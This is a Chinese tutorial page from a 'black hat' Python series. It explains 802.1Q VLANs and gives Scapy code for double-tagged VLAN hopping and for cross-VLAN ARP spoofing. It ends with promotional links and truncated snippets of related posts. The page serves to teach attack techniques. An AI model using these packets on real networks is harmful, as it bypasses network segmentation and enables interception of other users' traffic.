2. 程式人生 > >Python黑帽程式設計 3.4 跨越VLAN

Python黑帽程式設計 3.4 跨越VLAN

阿新 發佈:2019-02-17

Python黑帽程式設計 3.4 跨域VLAN

VLAN(Virtual Local Area Network),是基於乙太網互動技術構建的虛擬網路,既可以將同一物理網路劃分成多個VALN,也可以跨越物理網路障礙,將不同子網中的使用者劃到同一個VLAN中。圖2是一個VLAN劃分的例子。

圖2

實現VLAN的方式有很多種,基於交換裝置的VLAN劃分,一般有兩種:

l  基於交換機的埠劃分

l  基於IEEE 802.1q協議,擴充套件乙太網幀格式

基於第二層的VLAN技術,有個Trunking的概念,Trunking是用來在不同的交換機之間進行連線,以保證在跨越多個交換機上建立的同一個VLAN的成員能夠相互通訊。其中交換機之間互聯用的埠就稱為Trunk埠。除了80.2.1q之外,思科有自己的Trunk協議叫ISL。

圖3

圖3是802.1q的資料包,和普通的乙太網幀並沒有本質的區別,只是增加一個了VLAN Tag。紅色部分的VLAN Identifier標識了一個數據包屬於哪個VLAN,從而保證了資料廣播的範圍不會跨越VLAN。

現在做簡單的思考,想要跨越VLAN通訊,是不是隻要修改資料包中的識別符號就可以了呢?

3.4.1 VLAN HOPPING

基於上面的分析,我們考慮一個簡單的場景:跨VLANping,從Vlan1的一個主機發送一個ping請求到Vlan2中的一個主機。

在具體編碼前,我們還是要先解決VLAN資料包構造的問題,在Scapy中我們使用Dot1Q類來構造圖3中的Tag部分。如圖4。

圖4

下面我們可以編寫一個跨VLAN的ping請求了。

#!/usr/bin/python    

from scapy.all import *   

packet = Ether(dst="c0:d3:de:ad:be:ef") / \

                Dot1Q(vlan=1) / \

                Dot1Q(vlan=2) / \

                IP(dst="192.168.13.3") / \

                ICMP()    

sendp(packet)

上面的程式碼我們指定了目標主機的MAC和IP地址,添加了兩個VLAN標識,第一個是傳送資料的主機所在的VLAN,第二個是目標主機所在的VLAN。交換機會移除第一個標識,讀到第二個標識的時候,會轉發該資料包到目標主機。

3.4.2  跨VLAN的ARP欺騙

3.1、3.2和3.3節我們都在討論ARP欺騙的問題,由於VLAN限制了廣播域,我們之前的程式碼是無法跨VLAN進行ARP欺騙的。不過要解決這個問題也很簡單,只需在我們之前構造的ARP欺騙資料中插入VLAN標識即可。下面這段程式碼是我們在3.1節構造ARP請求資料包的程式碼。

  def build_req():

        if options.target is None:

            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])

        elif options.target:

            target_mac = getmacbyip(options.target)

            if target_mac is None:

                print "[-] Error: Could not resolve targets MAC address"

                sys.exit(1)

            pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

        return pkt

在構造資料包的部分,我們插入VLAN標識:

   pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan)/ ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

這樣就可以實現跨VLAN的ARP欺騙了。

3.4.3 小結

本節主要講了如何構造欺騙VLAN的資料包,達到跨VLAN資料通訊和ARP欺騙的目的。需要注意的是,本文的方法主要針對802.1Q協議,對以埠進行物理隔離的的VLAN沒有效果。

下一節,我們繼續VLAN攻擊《3.5 DTP攻擊》。

第3.5節《DTP攻擊》已經在微信訂閱號搶先發布,心急的同學進入訂閱號(二維碼在下方),從選單“專欄”—>”Python黑帽程式設計”進入即可。

檢視完整系列教程,請關注我的微信訂閱號(xuanhun521,下方二維碼),回覆“python”。問題討論請加qq群:Hacking (1群):303242737   Hacking (2群):147098303。

 

玄魂工作室-精彩不斷

相關推薦

Python程式設計 3.4 跨越VLAN

Python黑帽程式設計 3.4 跨域VLAN VLAN(Virtual Local Area Network),是基於乙太網互動技術構建的虛擬網路,既可以將同一物理網路劃分成多個VALN,也可以跨越物理網路障礙,將不同子網中的使用者劃到同一個VLAN中。圖2是一個VLAN劃分的例子。 圖2 實現

Python程式設計 3.5 DTP攻擊

Python黑帽程式設計 3.5 DTP攻擊 在上一節,《Python黑帽程式設計 3.4 跨越VLAN》中,我們討論了一般的VLAN中實施攻擊的方法,這一節屬於擴充套件內容,簡單演

Python程式設計 4.1 Sniffer(嗅探器)之資料捕獲(上)

Python黑帽程式設計 4.1 Sniffer(嗅探器)之資料捕獲(上) 網路嗅探,是監聽流經本機網絡卡資料包的一種技術,嗅探器就是利用這種技術進行資料捕獲和分析的軟體。 編寫嗅探器,捕獲資

Python程式設計2.1 Python程式設計哲學

Python黑帽程式設計2.1  Python程式設計哲學 本節的內容有些趣味性,涉及到很多人為什麼會選擇Python,為什麼會喜歡這門語言。我帶大家膜拜下Python作者的Python之禪,然後再來了解下Python的程式設計規範。 2.1.1 ZEND OF PYTHON 在Kali中啟動終端

Python程式設計-ARP之一

一、ARP協議 中文名稱:地址解析協議 詳細背景及相關知識請參考原文及百度百科。 維基百科 地址解析協議(Address Resolution Protocol),其基本功能為透過目標裝置的IP地址,查詢目標裝置的MAC地址,以保證通訊的順利進

Python學習-將Python3.3.4還原成Python2.6版本

在Linux上,使用python,有時候需要python2,有時候需要python3,下面簡單介紹下將python3換成python2的方法。 1.檢視Python目前的版本 直接輸入 python 可以檢視Python版本 2.將/usr

1.面向過程程式設計 2.面向物件程式設計 3.類和物件 4.python 建立類和物件 如何使用物件 5.屬性的查詢順序 6.初始化函式 7.繫結方法 與非繫結方法

1.面向過程程式設計 面向過程:一種程式設計思想在編寫程式碼時 要時刻想著過程這個兩個字過程指的是什麼? 解決問題的步驟 流程,即第一步幹什麼 第二步幹什麼,其目的是將一個複雜的問題,拆分為若干的小的問題,按照步驟一一解決,也可以說 將一個複雜的問題,流程化(為其制定一個固定的實現流程),從而變得簡單化例如

Discuz!X 3.4 任意文件刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

Python數據分析(二): Numpy技巧 (3/4)

targe 工具 由於 ref 數據分析 技術分享 添加 pan note numpy、pandas、matplotlib(+seaborn)是python數據分析/機器學習的基本工具。 numpy的內容特別豐富,我這裏只能介紹一下比較常見的方法和屬性。 昨天晚上發

python入門:求1-2+3-4+5...99的所有數的和(自寫)

== 余數 奇數 nbsp int 當前 pre span bre 1 #!/usr/bin/env pyhton 2 # -*- coding:utf-8 -*- 3 #求1-2+3-4+5...99的所有數的和(自寫) 4 """ 5 給x賦值為0,給y賦值

通過2-3-4樹理解紅

文章 n+1 情況下 代碼實現 樹結構 沒有 case 多人 檢驗 前言 紅黑樹是數據結構中比較復雜的一種,最近與它交集頗多,於是花了一周的空閑時間跟它死磕,終於弄明白並實現了紅黑樹。寫文總結一下,希望能給試圖理解紅黑樹的同學一些靈感,也讓我能記得更深刻。 在研究紅黑樹時吃

python 1-2+3-4....99=? 這裏的題,我看到別人的寫法,五花八門的,自己也寫一個

blog sta 裏的 and str 想象力 pos 問題 就是 f = ""s = ""i = 1sum = 0while i < 100:   if i %2 == 1 and i < 99:     f = "-"

python--練習--2-3+4-5+6...+100=?

python--練習#!/usr/bin/python3 n=3sum=2while n<=100 : if n%2 !=0 : sum=sum-n n=n+1 else : sum=sum+n n=n+1 print("2-3+4-5+6...+100=&qu

python入門:求1-2+3-4+5...99的所有數的和

== python入門 ... sta rt+ color python while style 1 start =1 2 sum =0 3 while start <100: 4 if start % 2 ==0: 5 sum =sum -

python練習題,寫一個方法 傳進去列表和預期的value 求出所有變量得取值可能性(例如list為[1,2,3,4,5,6,12,19],value為20,結果是19+1==20只有一種可能性),要求時間復雜度為O(n)

num bubuko com pri def 代碼 data- 取值 .com 題目:(來自光榮之路老師)a+b==valuea+b+c=valuea+b+c+d==valuea+b+c+d+...=valuea和b....取值範圍都在0-value寫一個方法 傳進去列

4章:介紹python物件型別/4.1 python的核心資料型別/4.3 列表

獲取操作 >>> L = [123,'abc',1.23] >>> L[0]  從左邊開始獲取 123 >>> L[-1]   從右邊開始獲取 1.23 >>>

4章:介紹python物件型別/4.1 python的核心資料型別/4.2 字串/4.2.3 字串查詢、替換、分解、轉大小寫

字串查詢/替換/分解/轉大小寫 字串查詢 >>> S 'abcd' >>> S.find("bc") 1 替換 >>> S.replace("bc","xyz") 'axyzd' 分解 >>>

python函數語言程式設計3(裝飾器的深入理解)

一、什麼是裝飾器 1、python中裝飾器可以理解為AOP程式設計,有點類似Spring中的註解,在不改變原函式或類的基礎上,對函式或類新增額外(自己需求補充)的功能。 2、裝飾器本質上是一個函式,該函式用來處理其他函式,它可以讓其他函式在不需要修改程式碼的前提下增加額外的功能,裝飾器的返回值也是

Python月薪能翻3倍?這4個行業真相字字戳心!

從2017年開始,Python成為了現象級語言,一舉拿下程式語言的C位。作為“最容易學習”的膠水語言,萬能屬性的 Python 在程式設計開發中可以說是大殺四方,幾乎都可以輕鬆勝任。 而在這背後,有層出不窮的話題和文章出來,尤其噹噹 Python進入小學課本、乃至浙江省高考的政策

python爬蟲系列(3.4-使用xpath和lxml爬取伯樂線上)

一、爬取的程式碼 1、網站地址 2、具體實現程式碼 import requests from lxml import etree class JobBole(object):     def __init__(self):     &